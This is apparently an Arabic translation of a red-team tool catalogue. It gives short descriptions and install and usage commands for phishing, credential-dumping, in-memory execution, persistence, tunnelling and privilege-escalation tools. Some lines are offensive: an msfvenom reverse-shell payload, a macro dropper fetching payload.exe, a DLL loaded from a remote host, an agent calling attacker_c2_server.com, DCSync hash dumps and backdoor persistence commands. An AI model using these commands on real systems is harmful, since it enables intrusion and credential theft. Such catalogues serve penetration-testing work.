SquarePhish هي أداة تصيّد متطورة تستخدم تقنية تجمع بين تدفق مصادقة رمز جهاز OAuth ورموز QR (انظر [PhishInSuits](https://github.com/secureworks/PhishInSuits) لمزيد من المعلومات حول تدفق رمز جهاز OAuth لهجمات التصيّد).

خطوات الهجوم:

- إرسال رمز QR ضار إلى الضحية
- مسح الضحية لرمز QR باستخدام جهاز محمول
- توجيه الضحية إلى خادم يتحكم به المهاجم (بدء عملية تدفق مصادقة رمز جهاز OAuth)
- إرسال رمز MFA إلى الضحية عبر البريد الإلكتروني (تفعيل مؤقت 15 دقيقة لتدفق رمز جهاز OAuth)
- يقوم المهاجم باستقصاء المصادقة
- إدخال الضحية للرمز في موقع Microsoft الشرعي
- يحفظ المهاجم رمز المصادقة

**التثبيت:**```bash
git clone https://github.com/secureworks/squarephish; cd squarephish; pip install -r requirements.txt

ملاحظة: قبل استخدام أي من الوحدتين، قم بتحديث المعلومات المطلوبة في ملف settings.config المشار إليها بـ Required.

الاستخدام (Email Module):``` usage: squish.py email [-h] [-c CONFIG] [--debug] [-e EMAIL]

optional arguments: -h, --help show this help message and exit

-c CONFIG, --config CONFIG squarephish config file [Default: settings.config]

--debug enable server debugging

-e EMAIL, --email EMAIL victim email address to send initial QR code email to

root@kitploit:~
**الاستخدام (وحدة الخادم):**```
usage: squish.py server [-h] [-c CONFIG] [--debug]

optional arguments:
  -h, --help            show this help message and exit

  -c CONFIG, --config CONFIG
                        squarephish config file [Default: settings.config]

  --debug               enable server debugging

image

🔙King Phisher

King Phisher هي أداة تتيح للمهاجمين إنشاء وإرسال رسائل التصيد الاحتيالي (Phishing) إلى الضحايا بهدف الحصول على معلومات حساسة.

تتضمن الأداة ميزات مثل القوالب القابلة للتخصيص، وإدارة الحملات، وإمكانيات إرسال البريد الإلكتروني، مما يجعلها أداة قوية وسهلة الاستخدام لتنفيذ هجمات التصيد. باستخدام King Phisher، يمكن للمهاجمين استهداف الأفراد أو المؤسسات برسائل تصيد مقنعة وموجهة، مما يزيد من فرص نجاح هجماتهم.

تثبيت (Linux - Client & Server):```bash wget -q https://github.com/securestate/king-phisher/raw/master/tools/install.sh &&
sudo bash ./install.sh

root@kitploit:~
**الاستخدام:**

بمجرد تثبيت King Phisher، يُرجى اتباع [صفحة الويكي](https://github.com/rsmusllp/king-phisher/wiki/Getting-Started) لإعداد SSH، تكوين قاعدة البيانات، خادم SMTP، إلخ.

![image](https://assets.kitploit.com/production/public/readmes/495/ab8900f24709e60727b9ae8d91dc00da72eb17a099da35552cfd09ad542e20b5.png)

# التنفيذ

### [🔙](#tool-list)[Responder](https://github.com/SpiderLabs/Responder)

Responder هي أداة لتسميم بروتوكولي LLMNR و NBT-NS على الشبكة، للسماح بالتقاط بيانات الاعتماد وتنفيذ تعليمات برمجية عشوائية.

يتم استخدام بروتوكولي LLMNR (حل الأسماء متعددة البث على الرابط المحلي) و NBT-NS (خدمة أسماء NetBIOS) من قبل أنظمة ويندوز لحل أسماء المضيفين إلى عناوين IP على شبكة محلية. إذا تعذر حل اسم مضيف باستخدام هذه البروتوكولات، فسيقوم النظام ببث طلب لاسم المضيف إلى الشبكة المحلية.

يستمع Responder إلى هذه البثوث ويستجيب بعنوان IP مزيف، مخادعًا النظام الطالب لإرسال بيانات اعتماده إلى المهاجم.

**التثبيت:**```bash
git clone https://github.com/SpiderLabs/Responder#usage
cd Responder

الاستخدام:```bash

Running the tool

./Responder.py [options]

Typical usage

./Responder.py -I eth0 -wrf

root@kitploit:~
يمكن العثور على معلومات الاستخدام الكاملة [هنا](https://github.com/SpiderLabs/Responder#usage).

![image](https://assets.kitploit.com/production/public/readmes/495/1557d2d9375fcf140ae01d21311d11ce93eabb676e40f6eb39ec25e0f4959c12.png)

_الصورة المستخدمة من https://www.4armed.com/blog/llmnr-nbtns-poisoning-using-responder/_

### [🔙](#tool-list)[secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py)

أداة مساعدة هي جزء من مكتبة Impacket يمكن استخدامها لاستخراج تجزئات كلمات المرور والأسرار الأخرى من نظام Windows.

تقوم بذلك عن طريق التفاعل مع قاعدة بيانات مدير حسابات الأمان (SAM) على النظام واستخراج كلمات المرور المجزأة وغيرها من المعلومات، مثل:

- تجزئات كلمات المرور للحسابات المحلية
- تذاكر Kerberos والمفاتيح
- أسرار LSA

**التثبيت:**```bash
python3 -m pip install impacket

الاستخدام:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

DCSync attack and dump the NTLM hashes of all domain users.

secretsdump.py -dc-ip 10.10.10.30 MEGACORP.LOCAL/svc_bes:[email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e9e242c346297388c540da63c467f568ea0b33980e52d48bd8154d745147f192.png)

_الصورة مستخدمة من https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy_

### [🔙](#tool-list)[evil-winrm](https://github.com/Hackplayers/evil-winrm)

Evil-WinRM هي أداة توفر واجهة سطر أوامر للإدارة عن بُعد لنظام ويندوز (WinRM: _خدمة تسمح للمسؤولين بتنفيذ الأوامر عن بُعد على جهاز يعمل بنظام ويندوز_).

تسمح Evil-WinRM للمهاجم بالاتصال عن بُعد بجهاز ويندوز باستخدام WinRM وتنفيذ أوامر عشوائية.

تتضمن بعض الميزات:

- تحميل نصوص Powershell في الذاكرة
- تحميل ملفات dll في الذاكرة لتجاوز بعض برامج مكافحة الفيروسات
- تحميل حمولات x64
- دعم تمرير التجزئة (Pass-the-hash)
- رفع وتنزيل الملفات المحلية والبعيدة

**التثبيت: (Git)**```bash
sudo gem install winrm winrm-fs stringio logger fileutils
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm

تثبيت: (Ruby gem)```bash gem install evil-winrm

root@kitploit:~
يمكن العثور على تعليمات التثبيت البديلة [هنا](https://github.com/Hackplayers/evil-winrm#installation--quick-start-4-methods).

**الاستخدام:**```bash
# Connect to 192.168.1.100 as Administrator with custom exe/ps1 download folder locations
evil-winrm  -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'

# Upload local files to victim
upload local_filename
upload local_filename destination_filename

# Download remote files to local machine
download remote_filename
download remote_filename destination_filename

# Execute .Net assembly into victim memory
Invoke-Binary /opt/csharp/Rubeus.exe

# Load DLL library into victim memory
Dll-Loader -http http://10.10.10.10/SharpSploit.dll

يمكن العثور على وثائق الاستخدام الكاملة هنا.

image

الصورة مستخدمة من https://korbinian-spielvogel.de/posts/heist-writeup/

🔙Donut

أداة للتنفيذ في الذاكرة لملفات VBScript وJScript وEXE وDLL وتجميعات dotNET. يمكن استخدامها لتحميل وتشغيل حمولات مخصصة على الأنظمة المستهدفة دون الحاجة إلى إسقاط ملفات على القرص.

التثبيت: (Windows)```bash git clone http://github.com/thewover/donut.git

root@kitploit:~
لتوليد قالب المحمل (loader template)، المكتبة الديناميكية donut.dll، المكتبة الثابتة donut.lib والمولد donut.exe. ابدأ موجه أوامر المطور الخاص بـ Microsoft Visual Studio (x64)، انتقل إلى الدليل حيث قمت بنسخ مستودع Donut وأدخل التالي:```bash
nmake -f Makefile.msvc

لفعل الشيء نفسه، باستثناء استخدام MinGW-64 على ويندوز أو لينكس، انتقل إلى الدليل الذي استنسخت فيه مستودع Donut وأدخل ما يلي:```bash make -f Makefile.mingw

root@kitploit:~
**التثبيت: (Linux)**```bash
pip3 install donut-shellcode

الاستخدام:```bash

Creating shellcode from an XSL file that pops up a calculator.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\calc.xsl")

Creating shellcode from an unmanaged DLL. Invokes DLLMain.

shellcode = donut.create(file=r"C:\Tools\Source\Repos\donut\payload\test\hello.dll")

root@kitploit:~
للحصول على معلومات الاستخدام الكاملة، راجع صفحة donut على [GitHub](https://github.com/TheWover/donut/#4-usage).

راجع [منشور مدونة حديث](https://thewover.github.io/Bear-Claw/) من The Wover لمزيد من المعلومات.

![image](https://assets.kitploit.com/production/public/readmes/495/f1dba24c73e1bc864c83173904c6592faee2f8aa854da293767b90d69449d5c4.png)

### [🔙](#tool-list)[Macro_pack](https://github.com/sevagas/macro_pack)

أداة تستخدم لأتمتة إخفاء وإنشاء مستندات Office، ونصوص VBScript، والاختصارات، وغيرها من التنسيقات للفريق الأحمر.

**التثبيت: (ثنائي)**

1. احصل على أحدث إصدار ثنائي من [https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)
2. قم بتنزيل الثنائي على جهاز كمبيوتر مثبت عليه Microsoft Office أصلي.
3. افتح وحدة التحكم، انتقل إلى دليل الثنائي باستخدام CD ثم قم باستدعاء الثنائي.

**التثبيت: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

الاستخدام:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

مجموعة من نصوص ووحدات PowerShell النصية التي يمكن استخدامها لتحقيق أهداف متنوعة في اختبار الاختراق (red teaming).

بعض ميزات PowerSploit:

- تفريغ تجزئات كلمات المرور واستخراج كلمات المرور النصية الصريحة من الذاكرة
- رفع الصلاحيات وتجاوز الضوابط الأمنية
- تنفيذ كود PowerShell عشوائي وتجاوز قيود التنفيذ
- إجراء استطلاع واكتشاف للشبكة
- إنشاء الحمولات (payloads) وتنفيذ الثغرات

**التثبيت:** _1. احفظ في مجلد وحدات PowerShell_

أولاً، ستحتاج إلى تنزيل [مجلد PowerSploit](https://github.com/PowerShellMafia/PowerSploit) وحفظه في مجلد وحدات PowerShell الخاص بك.

يمكن العثور على مسار مجلد وحدات PowerShell الخاص بك باستخدام الأمر التالي:```
$Env:PSModulePath

تثبيت: 2. تثبيت PowerSploit كوحدة PowerShell

ستحتاج بعد ذلك إلى تثبيت وحدة PowerSploit (استخدم اسم المجلد الذي تم تنزيله).

ملاحظة: قد تمنعك سياسة تنفيذ PowerShell من ذلك، لإصلاح هذا قم بتشغيل الأمر التالي.``` powershell.exe -ep bypass

root@kitploit:~
الآن يمكنك تثبيت وحدة PowerSploit.```
Import-Module PowerSploit

الاستخدام:``` Get-Command -Module PowerSploit

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

أداة يمكن استخدامها لتنفيذ إجراءات متنوعة تتعلق ببيئات Microsoft Active Directory (AD)، مثل تفريغ تجزئات كلمات المرور، إنشاء/حذف المستخدمين، وتعديل خصائص المستخدم.

بعض ميزات Rubeus:

- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks

**التثبيت: (تنزيل)**

يمكنك تثبيت الثنائي غير الرسمي المُجمَّع مسبقًا لـ Rubeus [من هنا](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe).

**التثبيت: (تجميع)**

Rubeus متوافق مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح مشروع rubeus [.sln](https://github.com/GhostPack/Rubeus)، اختر "Release"، وقم بالبناء.

**الاستخدام:**```
Rubeus.exe -h

image

🔙SharpUp

أداة مفيدة لفحص نقطة نهاية الضحية بحثًا عن ثغرات تتعلق بالعمليات ذات النزاهة العالية، والمجموعات، والمسارات القابلة للاختطاف، إلخ.

التثبيت: (تنزيل)

يمكنك تثبيت الثنائي المُجمّع مسبقًا غير الرسمي لـ SharpUp هنا.

التثبيت: (تجميع)

SharpUp متوافق مع Visual Studio 2015 Community Edition. افتح ملف المشروع .sln لـ SharpUp هنا، اختر "Release"، وابْنِ.

الاستخدام:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) هو نظام إدارة قواعد بيانات علائقية تم تطويره وتسويقه بواسطة Microsoft.

تم تصميم هذه الأداة من C# لـ MS-SQL للاستطلاع الهجومي وما بعد الاستغلال. للحصول على معلومات مفصلة حول كل تقنية، راجع [wiki](https://github.com/skahwah/SQLRecon/wiki).

**التثبيت: (ثنائي)**

يمكنك تنزيل أحدث إصدار ثنائي من [هنا](https://github.com/skahwah/SQLRecon/releases).

**الاستخدام:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

يمكن العثور على معلومات الاستخدام الكاملة في الويكي.

يمكن العثور على معلومات استخدام الوحدة النمطية للأداة هنا.

image

الصورة مأخوذة من صفحة تعليمات SQLRecon

🔙UltimateAppLockerByPassList

هذا المورد هو مجموعة من أشهر التقنيات المعروفة لتجاوز AppLocker.

نظرًا لأنه يمكن تكوين AppLocker بطرق مختلفة، يحتفظ @api0cradle بقائمة مُتحقق منها من التجاوزات (التي تعمل ضد قواعد AppLocker الافتراضية) وقائمة تحتوي على تقنية تجاوز محتملة (اعتمادًا على التكوين) أو يُزعم أن شخصًا ما قد قام بتجاوزها.

ولديهم أيضًا قائمة بتقنيات التجاوز العامة بالإضافة إلى قائمة قديمة من طرق التنفيذ عبر DLLs.

القوائم المفهرسة

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

الصورة مأخوذة من https://github.com/api0cradle/UltimateAppLockerByPassList

🔙StarFighters

مشغل Empire يعتمد على JavaScript و VBScript، يعمل داخل مضيف PowerShell المضمن الخاص به.

يعمل كلا المشغلين داخل مضيف PowerShell المضمن الخاص بهما، لذلك لا نحتاج إلى PowerShell.exe.

قد يكون هذا مفيدًا عندما تقوم شركة بحظر PowerShell.exe و/أو تستخدم حل قائمة السماح للتطبيقات، ولكنها لا تمنع تشغيل ملفات JS/VBS.

الاستخدام:

  • إعداد مستمع جديد داخل PowerShell Empire
  • استخدم أمر المشغل لإنشاء مشغل PowerShell لهذا المستمع
  • انسخ واستبدل حمولة المشغل المشفرة بـ Base64 داخل ملف StarFighter JavaScript أو VBScript

بالنسبة لإصدار JavaScript استخدم المتغير التالي:```javascript var EncodedPayload = "";

root@kitploit:~
لإصدار VBScript، استخدم المتغير التالي:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"

ثم قم بتشغيل: wscript.exe StarFighter.js أو StarFighter.vbs على الهدف، أو انقر نقرًا مزدوجًا على المشغلات داخل المستكشف.

image

الصورة مستخدمة من https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

الهدف من هذا المشروع هو إنشاء ملفات .html تحتوي على ملف HTA مشفر.

الفكرة هي أنه عندما يزور هدفك الصفحة، يتم جلب المفتاح ويتم فك تشفير ملف HTA ديناميكيًا داخل المتصفح ويتم دفعه مباشرة إلى المستخدم.

هذه تقنية مراوغة لتجاوز فحص المحتوى / نوع الملف المطبق من قبل بعض الأجهزة الأمنية.

مزيد من المعلومات التقنية هنا.

التثبيت:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**الاستخدام:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

صورة

الصورة مستخدمة من https://github.com/nccgroup/demiguise

الثبات

🔙Impacket

توفر Impacket مجموعة من الروابط (bindings) بلغة بايثون على مستوى منخفض لبروتوكولات شبكة متنوعة، بما في ذلك SMB وKerberos وLDAP، بالإضافة إلى مكتبات على مستوى أعلى للتفاعل مع خدمات الشبكة وتنفيذ مهام محددة مثل تفريغ تجزئات كلمات المرور وإنشاء مشاركات الشبكة.

تتضمن أيضًا عددًا من أدوات سطر الأوامر التي يمكن استخدامها لتنفيذ مهام متنوعة مثل تفريغ قواعد بيانات SAM، وتعداد علاقات الثقة بالمجال، وكسر كلمات مرور Windows.

التثبيت:```bash python3 -m pip install impacket

root@kitploit:~
**التثبيت: (مع أمثلة البرامج النصية)**

قم بتنزيل واستخراج [الحزمة](https://github.com/fortra/impacket)، ثم انتقل إلى مجلد التثبيت وقم بتشغيل...```bash
python3 -m pip install .

الاستخدام:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
Great [cheat sheet](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/) لاستخدام Impacket.

![image](https://assets.kitploit.com/production/public/readmes/495/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire هو إطار عمل ما بعد الاستغلال (post-exploitation) يتيح لك إنشاء حمولات (payloads) لإنشاء اتصالات عن بُعد مع أنظمة الضحايا.

بمجرد تنفيذ الحمولة على نظام الضحية، فإنها تنشئ اتصالًا يعود إلى خادم Empire، والذي يمكن استخدامه بعد ذلك لإصدار الأوامر والتحكم في النظام المستهدف.

يتضمن Empire أيضًا عددًا من الوحدات والبرامج النصية المدمجة التي يمكن استخدامها لأداء مهام محددة، مثل تفريغ تجزئات كلمات المرور (password hashes)، والوصول إلى سجل Windows (Windows registry)، وتسريب البيانات (exfiltrating data).

**تثبيت:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

الاستخدام:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
ورقة غش مفيدة للاستخدام من [HarmJoy](https://github.com/HarmJ0y).

![صورة](https://assets.kitploit.com/production/public/readmes/495/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

أداة استمرارية لنظام ويندوز مكتوبة بلغة C#.

يحتوي المشروع على [ويكي](https://github.com/mandiant/SharPersist/wiki).

**تثبيت: (ثنائي)**

يمكنك العثور على أحدث إصدار [هنا](https://github.com/mandiant/SharPersist/releases).

**تثبيت: (تجميع)**

- قم بتنزيل ملفات المشروع من [مستودع GitHub](https://github.com/mandiant/SharPersist).
- قم بتحميل مشروع Visual Studio واذهب إلى "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
- اذهب إلى "NuGet Package Manager" --> "Package Sources"
- أضف مصدر حزمة بعنوان URL "https://api.nuget.org/v3/index.json"
- قم بتثبيت حزمة Costura.Fody NuGet. الإصدار الأقدم من Costura.Fody (3.3.3) مطلوب، بحيث لا تحتاج إلى Visual Studio 2019.
  - `Install-Package Costura.Fody -Version 3.3.3`
- قم بتثبيت حزمة TaskScheduler
  - `Install-Package TaskScheduler -Version 2.8.11`
- يمكنك الآن بناء المشروع بنفسك!

**الاستخدام:**

يمكن العثور على قائمة كاملة بأمثلة الاستخدام [هنا](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add).```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ng هي أداة بسيطة وخفيفة وسريعة تسمح لمختبري الاختراق بإنشاء أنفاق من اتصال TCP/TLS عكسي باستخدام واجهة tun (دون الحاجة إلى SOCKS).

بدلاً من استخدام وكيل SOCKS أو معيدات توجيه TCP/UDP، يقوم Ligolo-ng بإنشاء مكدس شبكة في وضع المستخدم باستخدام Gvisor.

عند تشغيل خادم الترحيل/الوكيل، يتم استخدام واجهة tun، ويتم تحويل الحزم المرسلة إلى هذه الواجهة، ثم إرسالها إلى شبكة الوكيل البعيدة.

التثبيت: (تنزيل)

الملفات الثنائية المترجمة مسبقًا (Windows/Linux/macOS) متاحة على صفحة الإصدارات.

التثبيت: (بناء)

بناء ligolo-ng (يتطلب Go >= 1.17):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**الإعداد: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

الإعداد: (ويندوز)

تحتاج إلى تنزيل برنامج تشغيل Wintun (المستخدم بواسطة WireGuard) ووضع ملف wintun.dll في نفس المجلد الذي يوجد به Ligolo (تأكد من استخدام البنية الصحيحة).

الإعداد: (خادم الوكيل)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**الاستخدام:**

_ابدأ تشغيل العامل على جهاز الكمبيوتر المستهدف (الضحية) (لا يلزم وجود صلاحيات!):_```bash
./agent -connect attacker_c2_server.com:11601

يجب أن تظهر جلسة على خادم الوكيل.``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
استخدم الأمر session لتحديد الوكيل.```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

يمكن العثور على معلومات الاستخدام الكاملة هنا.

image

الصورة مأخوذة من https://github.com/nicocha30/ligolo-ng#demo

تصعيد الامتيازات

🔙LinPEAS

LinPEAS هي أداة تصعيد امتيازات مفصلة ومفيدة لإيجاد مسارات تصعيد الامتيازات المحلية على نقاط نهاية لينكس.

التثبيت والاستخدام:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS هي أداة ممتازة ومفصلة لتصعيد الامتيازات (privesc) لاكتشاف مسارات تصعيد الامتيازات المحلية على نقاط نهاية Windows.

**تثبيت + استخدام:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

التعداد الذكي لنظام لينكس هو أداة جيدة أخرى أقل إسهابًا لتصعيد الامتيازات في لينكس.

التثبيت + الاستخدام:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify هي أداة بلغة C# لتعداد واستغلال سوء التكوين في خدمات الشهادات الخاصة بـ Active Directory (AD CS).

تم تصميم Certify لاستخدامها جنبًا إلى جنب مع أدوات وتقنيات الفريق الأحمر الأخرى، مثل Mimikatz وPowerShell، لتمكين المخترقين (red teamers) من تنفيذ أنواع مختلفة من الهجمات، بما في ذلك هجمات الوسيط (man-in-the-middle)، وهجمات انتحال الشخصية، وهجمات تصعيد الامتيازات.

**الميزات الرئيسية لـ Certify:**

- إنشاء الشهادات
- توقيع الشهادات
- استيراد الشهادات
- تعديل الثقة في الشهادات

**التثبيت: (التجميع)**

Certify متوافقة مع [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/). افتح مشروع Certify [.sln](https://github.com/GhostPack/Certify)، واختر "Release"، ثم قم بالتجميع.

**التثبيت: (تشغيل Certify عبر PowerShell)**

إذا كنت ترغب في تشغيل Certify في الذاكرة عبر غلاف PowerShell، فقم أولاً بتجميع Certify ثم تحويل التجميع الناتج إلى base64:```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

يمكن بعد ذلك تحميل Certify في سكريبت PowerShell باستخدام ما يلي (حيث يتم استبدال "aa..." بسلسلة تجميع Certify المشفرة بـ base64):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
يمكن بعد ذلك استدعاء الأسلوب Main() وأي وسائط على النحو التالي:```
[Certify.Program]::Main("find /vulnerable".Split())

يمكن العثور على تعليمات التجميع الكاملة هنا.

الاستخدام:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
يمكن العثور على شرح كامل للمثال [هنا](https://github.com/GhostPack/Certify#example-walkthrough).

![صورة](https://assets.kitploit.com/production/public/readmes/495/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPassword هو سكريبت PowerShell جزء من مجموعة أدوات PowerSploit، وهو مصمم لاسترداد كلمات المرور للحسابات المحلية التي يتم إنشاؤها وإدارتها باستخدام تفضيلات نهج المجموعة (GPP).

يعمل Get-GPPPassword عن طريق البحث في مجلد SYSVOL على وحدة تحكم المجال عن أي ملفات GPP تحتوي على معلومات كلمة المرور. بمجرد العثور على هذه الملفات، يقوم بفك تشفير معلومات كلمة المرور وعرضها على المستخدم.

**التثبيت:**

اتبع [تعليمات التثبيت](https://github.com/A-poc/RedTeam-Tools#powersploit) الخاصة بـ PowerSploit من صفحة الأداة هذه.```bash
powershell.exe -ep bypass
Import-Module PowerSploit

الاستخدام:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

نص PowerShell للعثور بسرعة على تصحيحات البرامج المفقودة لثغرات رفع الامتيازات المحلية.

_يدعم:_

- MS10-015 : وضع المستخدم إلى الحلقة (KiTrap0D)
- MS10-092 : جدولة المهام
- MS13-053 : تجاوز سعة كومة Win32k NTUserMessageCall
- MS13-081 : صفحة NULL لـ TrackPopupMenuEx Win32k
- MS14-058 : إلغاء مرجع المؤشر الفارغ لـ TrackPopupMenu Win32k
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : تجاوز سعة مخزن مؤقت لبرنامج تشغيل الخط
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : مقبض تسجيل الدخول الثانوي
- MS16-034 : برامج تشغيل وضع النواة في Windows EoP
- MS16-135 : رفع الامتياز في Win32k
- CVE-2017-7199 : وكيل Nessus 6.6.2 - 6.10.3 رفع الامتياز

**التثبيت: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

الاستخدام: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

_الصورة مستخدمة من https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/_

